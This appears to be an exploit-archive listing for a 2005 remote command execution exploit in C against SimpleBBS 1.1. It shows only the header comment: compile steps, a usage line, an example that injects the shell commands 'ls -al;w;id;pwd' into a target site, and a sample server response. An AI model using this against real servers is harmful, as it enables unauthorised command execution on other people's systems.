1361_SIMPLEBBS 1.1-远程命令执行-PHP WebApps exploit.c

详情

/*  SimpleBBS <= v1.1 remote commands execution in c  coded by: unitedasia v.Dec.7.2005  greetz: iloveyouma  http://geography.about.com/library/maps/blrasia.htm
http://www.lib.utexas.edu/maps/middle_east_and_asia/asia_pol00.jpg  $ gcc -o bbs bbs.c  Usage ./bbs [host] [/folder/] [cmd]  $ ./bbs www.somesite.com /simplebbs/ 'ls%20-al;w;id;pwd'  HTTP/1.1 200 OK
Date: Wed, 07 Dec 2005 15:31:07 GMT
Server: Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.0 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.6b
X-Powered-By: PHP/4.4.0
Connection: close
Content-Type: text/html  161||||||1|||Winning||||||0|||Willy\\\">